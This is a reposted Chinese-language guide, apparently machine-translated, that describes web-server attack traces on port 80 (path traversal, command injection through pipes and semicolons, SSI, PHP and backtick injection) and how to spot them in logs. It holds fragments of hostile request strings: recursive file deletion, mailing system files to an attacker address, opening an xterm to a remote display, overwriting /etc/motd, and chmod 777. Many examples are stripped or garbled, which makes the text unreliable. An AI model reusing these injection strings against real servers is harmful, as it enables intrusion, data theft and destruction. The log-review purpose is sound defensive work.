華為開發(fā)者社區(qū)年中活動，參加了1億碼豆的拆分活動！ >>>

摘要]

該網(wǎng)站默認為80作為服務端口. 有關它的各種安全問題不斷發(fā)布. 其中一些漏洞甚至允許攻擊者獲得系統(tǒng)管理員訪問該站點的權限. 以下是Zenomorph研究的80種端口攻擊方法中的一些痕跡，并告訴您如何從日志記錄中查找問題.

[詳細說明]

以下部分顯示了對Web服務器及其上的應用程序的一些常見攻擊，以及一些示例留下的痕跡. 這些示例僅代表主要的攻擊方法，并未列出所有攻擊形式. 本節(jié)將詳細描述每種攻擊的作用以及如何利用這些漏洞.

（1）“. ”“ ..”和“ ...”請求

這些攻擊跟蹤對于Web應用程序和Web服務器非常普遍. 它用于允許攻擊者或蠕蟲程序更改Web服務器的路徑并獲得對私有區(qū)域的訪問權限. 大多數(shù)CGI程序漏洞都包含這些“ ..”請求.

示例:

此示例顯示攻擊者請求mosd文件. 如果攻擊者能夠突破Web服務器的根目錄，則可以獲得更多信息，并且可以獲得更多特權.

（2）“％20”請求

％20是代表空格的十六進制值. 盡管這并不意味著您可以使用什么，但在瀏覽日志時會找到它. 該字符在Web服務器上運行的某些應用程序中可能有效. 實施，因此您應該仔細查看日志. 另一方面，此請求有時可以幫助執(zhí)行一些命令.

示例:

％20-al |

此示例表明，攻擊者執(zhí)行了unix命令，在請求的整個目錄中列出了文件，從而使攻擊者訪問了系統(tǒng)中的重要文件，從而幫助他進一步獲得了提供條件的特權.

（3）“”請求

表示一個十六進制的空字節(jié)，可用于欺騙Web應用程序并請求不同類型的文件.

示例:

這可能是此機器上的有效請求. 如果攻擊者注意到請求操作成功，他將進一步查找此cgi程序的問題.

此cgi程序可能不接受此請求，因為它需要檢查所請求文件的后綴，例如: html.shtml或其他類型的文件. 大多數(shù)程序會告訴您請求的文件類型無效. 這時，它將告知攻擊者所請求的文件必須是帶有特定字符后綴的文件類型. 這樣，攻擊者可以獲得系統(tǒng)路徑和文件名，從而使您的系統(tǒng)獲得更敏感的信息

請注意此請求，它將使cgi程序誤以為該文件是某種可接受的文件類型. 一些應用程序會愚蠢地檢查有效的請求文件，這是攻擊者常用的方法.

（4）“ |”請求

這是一個管道字符，在Unix系統(tǒng)中用于幫助在一個請求中執(zhí)行多個系統(tǒng)命令.

示例:

#cataccess_log | grep-i“ ..”

（此命令將在日志中顯示“ ..”請求，通常用于查找攻擊者和蠕蟲攻擊）

您經(jīng)常會看到許多Web應用程序使用此字符，這也會在IDS日志中導致錯誤警報.

在仔細檢查程序時，這很有用，并且可以減少入侵檢測系統(tǒng)中的誤報.

以下是一些示例:

|

此請求命令已執(zhí)行，下面是一些更改的示例

％20-al％20 / etc |

此請求列出了unix系統(tǒng)上/ etc目錄中的所有文件

％20access_log | grep％20-i％20“ lame”

執(zhí)行cat命令和grep命令的請求也會被執(zhí)行，查詢?yōu)椤?lame”

（5）“;”請求

在UNIX系統(tǒng)上，此字符允許一行執(zhí)行多個命令

示例:

#id; uname-a

（執(zhí)行id命令后，立即執(zhí)行uname命令）

某些Web應用程序使用此字符，這可能導致警告在IDS日志中失敗. 您應該仔細檢查Web應用程序，以減少IDS警報失敗的可能性.

（6）“;”請求

您應該在日志記錄中檢查這兩個字符. 在許多原因中，第一個是該字符指示添加的數(shù)據(jù)在文件中

示例1:

#echo“ yourhax0redh0h0”>;>; / etc / motd（請求在motd文件中寫入信息）

攻擊者可以通過上述請求輕松篡改您的網(wǎng)頁. 例如，攻擊者經(jīng)常使用著名的RDSexploit來更改主頁.

示例2:

; Hi％20mom％20Im％20Bold！;

您將在此處注意到html語言徽標，他還使用了“ <”，“>”字符，此攻擊無法導致攻擊者訪問系統(tǒng)，這使人們感到混淆，這是網(wǎng)站上的合法信息. 中級（導致人們訪問攻擊者在訪問此連接時設置的地址，該請求可能會轉換為十六進制編碼的字符形式，從而使攻擊的蹤跡不那么明顯）

（7）“！”請求

此字符要求使用通用語言攻擊SS（ServerSideInclude）I. 如果攻擊者使用戶單擊攻擊者設置的連接，則與上面相同.

示例:

;

此示例是攻擊者可能執(zhí)行的操作郵件攻擊，它使host2站點上的文件似乎來自host1（當然，訪問者需要訪問攻擊者設置的連接. 此請求可能轉換為十六進制編碼偽裝，不容易找到）

與此同時，此方法還可以在網(wǎng)站的授權下執(zhí)行命令

示例:

;

此示例在遠程系統(tǒng)上執(zhí)行“ id”命令，它將顯示該網(wǎng)站用戶的ID，通常是“ nobody”或“ www”

此表單還允許包含隱藏文件.

示例:

;

此隱藏文件.htpasswd將不會顯示，Apache建立的規(guī)則將以.ht形式拒絕此請求，并且SSI徽標將繞過此限制并導致安全問題

（8）”

此攻擊用于嘗試在遠程Web應用程序中插入PHP程序. 它可能允許執(zhí)行命令，具體取決于服務器設置以及影響它的其他因素（例如，PHP設置為安全模式）

示例: ;

在某些簡單的php應用程序中，它可以在具有網(wǎng)站用戶權限的情況下在遠程系統(tǒng)上執(zhí)行本地命令

（9）“`”請求

此字符通常用于在perl中執(zhí)行命令. 此字符在Web應用程序中并不經(jīng)常使用，因此，如果您在日志中看到該字符，則應非常小心

示例:

`id`

由perl編寫的有問題的cgi程序將導致執(zhí)行id命令

[更進一步]

以下部分將討論攻擊者可能執(zhí)行的更多命令以及所請求的文件，如果您在遠程執(zhí)行該命令時遇到缺陷，如何檢查和查找它. 這部分只是給您一個好主意，并告訴您系統(tǒng)發(fā)生了什么. 攻擊者試圖攻擊您的系統(tǒng)，但未列出攻擊者使用的所有命令和請求.

“ / bin / ls”

此命令請求整個路徑，并且此漏洞存在于許多Web應用程序中. 如果您在日志中的許多位置看到此請求，則很有可能存在一個遠程命令執(zhí)行漏洞，但不是. 這一定是問題或錯誤警報. 再次，書面的Web應用程序（cgi，asp，php ...等）是安全性的基礎

示例:

％20-al |

％20-al;

“ cmd.exe”

這是Windows shell. 如果攻擊者訪問并運行此腳本，則在服務器設置允許的情況下，他可以在Windows計算機上執(zhí)行任何操作. 許多蠕蟲通過端口80傳播到遠程計算機. Up

tem32 / cmd.exe？dir + e:

“ / bin / id”

這是一個二進制文件. 問題與/ bin / ls相同. 如果您在日志中的許多地方看到此請求，則很有可能存在一個遠程命令執(zhí)行漏洞，但不是. 這一定是問題或錯誤警報.

它將顯示他們屬于哪個用戶和哪個組

示例:

|

;

“ / bin / rm”

如果使用不當非常危險，此命令可以刪除文件

示例:

％20-rf％20 * |

％20-rf％20 *;

“ wgetandtftp”命令

攻擊者經(jīng)常使用這些命令來下載可能進一步獲得特權的文件. wget是Unix下的命令，可用于下載后門程序. tftp是unix和nt下的命令，用于下載文件. 一些IIS蠕蟲使用tftp復制自身以將病毒傳播到其他主機

示例:

％20 |％20;

“貓”命令

此命令用于查看文件的內(nèi)容. 它通常用于讀取重要信息，例如配置文件，密碼文件，文件以及您可以想到的文件

示例: ％20 / etc / motd |％20 / etc / motd;

“ echo”命令

此命令通常用于將數(shù)據(jù)寫入文件，例如“ index.html”

示例: ％20“ fc-#kiwis％20was％20here”％20>;> ;;;％200day.txt |％20“ fc-#kiwis％20was％20here”％20>;> ;;％200day.txt ;

“ ps”命令

列出當前正在運行的進程，并告訴攻擊者遠程主機正在運行哪種軟件，以獲取有關安全問題的一些想法并獲取更多權限

示例: ％20-aux |％20-aux;

“ killandkillall”命令

在unix系統(tǒng)中，此命令用于終止進程. 攻擊者可以使用此命令來停止系統(tǒng)服務和程序，并同時清除攻擊者的蹤跡. 一些漏洞會產(chǎn)生很多子進程

示例: ％20-9％200 |％20-9％200;

“ uname”命令

此命令告訴攻擊者遠程計算機的名稱. 有時，通過此命令，您可以知道網(wǎng)站位于哪個isp，也許攻擊者這次已經(jīng)訪問過. 通常用uname -a來請求，這些將記錄在日志文件中

示例: ％20-a |％20-a;

“ cc，gcc，perl，python等...”編譯/解釋命令

攻擊者通過wget或tftp下載漏洞利用程序，并使用cc或gcc等編譯器將其編譯為可執(zhí)行程序，并進一步獲得特權

示例: ％20Phantasmp.c |％20Phantasmp.c; ./ a.out％20-p％2031337;

如果您在日志中找到“ perl” python，則這些說明可能使攻擊者下載遠程perl，python腳本并嘗試在本地獲取特權

“郵件”命令

攻擊者通常使用此命令將系統(tǒng)的一些重要文件發(fā)送到攻擊者自己的郵箱，也可以用于攻擊郵件

示例: ％20attacker @好學cncnkerker.org％20

“ xterm /其他X應用程序”命令

xterm通常用于在遠程計算機上獲取shell. 如果在日志中找到這些符號，則應仔細分析系統(tǒng)，可能已經(jīng)存在安全漏洞. 請注意在日志中查找字符“％20-display％20”. 這種跟蹤通常是在遠程計算機上啟動xterm或X應用程序

示例: ％20-display％20192.168.22.1 |％20-display％20192.168.22.1;

“ chown，chmod，chgrp，chsh等...”和其他命令

在UNIX系統(tǒng)上，這些命令允許您更改文件權限

chown =允許設置文件所有者chmod =允許設置文件權限chgrp =允許更改文件的組所有權chsh =允許更改用戶的shell

示例: ％20777％20index.html |％20777％20index.html;％20zeno％20 / etc / master.passwd |％20 / bin / sh;％20nobody％20 / etc / shadow |

“ / etc / passwd”文件

這是系統(tǒng)的密碼文件，通常會被遮蓋，并且不允許您查看加密的密碼郵件攻擊，但是對于攻擊者來說，您可以知道有效用戶和系統(tǒng)的絕對路徑，網(wǎng)站名稱和其他信息，因為它通常是被遮蓋的，所以對于攻擊者來說，通常檢查/ etc / shadow文件

“ / etc / master.passwd”

此文件是BSD系統(tǒng)的密碼文件，其中包含加密的密碼. 該文件僅對root帳戶是只讀的，一些不熟練的攻擊者將打開他的嘗試來讀取內(nèi)容. 如果網(wǎng)站以root權限運行，那么對于攻擊者來說，它可以讀取其內(nèi)容，并且系統(tǒng)管理員遇到的許多問題也將陸續(xù)出現(xiàn).

“ / etc / shadow”

包含加密的系統(tǒng)密碼，該密碼對于root帳戶也是只讀的，類似于/et/master.passwd

“ / etc / motd”

當用戶登錄到unix系統(tǒng)時，該信息將顯示在此“ MessageoftheDay”文件中，該文件提供了重要的系統(tǒng)信息以及管理員為用戶提供的一些設置. 這些是用戶想要看到的，而那些不是，并且包含系統(tǒng)的版本信息. 攻擊者通常檢查此文件以了解正在運行的系統(tǒng). 對于攻擊者而言，下一步就是搜索利用這種系統(tǒng)的漏洞，以進一步獲得系統(tǒng)特權

“ / etc / hosts”

本文來自本站，轉載請注明本文網(wǎng)址：
http://www.pc-fly.com/a/jisuanjixue/article-263872-1.html